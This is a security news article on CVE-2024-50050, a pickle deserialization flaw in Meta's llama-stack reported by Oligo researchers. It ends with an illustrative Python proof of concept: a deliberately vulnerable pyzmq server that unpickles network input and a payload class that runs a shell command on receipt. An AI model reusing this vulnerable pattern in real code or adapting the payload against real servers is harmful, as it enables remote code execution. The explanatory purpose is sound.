Meta’s large language model (LLM) framework, Llama, suffers from a typical open-source coding oversight, potentially allowing arbitrary code execution on servers and leading to resource theft, data breaches, and AI model takeover.
The flaw, tracked as CVE-2024-50050, is a critical deserialization bug belonging to a class of vulnerabilities arising from the improper use of the open-source library pyzmq in AI frameworks.
“The Oligo research team has discovered a critical vulnerability in meta-llama, an open-source framework from Meta for building and deploying Gen AI applications,” said Oligo’s security researchers in a blog post. “The vulnerability, CVE-2024-50050, enables attackers to execute arbitrary code on the llama-stack inference server from the network.”
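To illustrate the class of bug involved (and not Meta’s actual code), the minimal sketch below shows how pyzmq’s `recv_pyobj()` deserializes incoming messages with Python’s pickle, which runs attacker-controlled code during unpickling if the socket is reachable over the network. The function names, socket addresses, and payload here are hypothetical examples; the safe alternative shown in the comments is exchanging plain JSON instead of pickled objects.

```python
# Illustrative sketch of the vulnerability class, assuming a pyzmq REQ/REP
# service that trusts whatever arrives on the wire. Not the llama-stack code.
import zmq


def vulnerable_server(bind_addr: str = "tcp://0.0.0.0:5555") -> None:
    """Hypothetical server that unpickles untrusted network input."""
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REP)
    sock.bind(bind_addr)
    # recv_pyobj() pickle-loads the raw message: unpickling untrusted bytes
    # lets an attacker execute arbitrary code via a crafted __reduce__.
    # A safer pattern is sock.recv_json() / sock.send_json() with plain data.
    obj = sock.recv_pyobj()
    sock.send_pyobj({"status": "ok", "echo": repr(obj)})


class Payload:
    """Attacker-side object: __reduce__ tells pickle to call os.system."""

    def __reduce__(self):
        import os
        # Harmless demo command; a real attacker would run anything here.
        return (os.system, ("id > /tmp/pwned",))


def attacker(connect_addr: str = "tcp://127.0.0.1:5555") -> None:
    """Sends the pickled payload; the server executes it on receipt."""
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REQ)
    sock.connect(connect_addr)
    sock.send_pyobj(Payload())   # pickled by pyzmq
    print(sock.recv_pyobj())     # server replies after the side effect fires
```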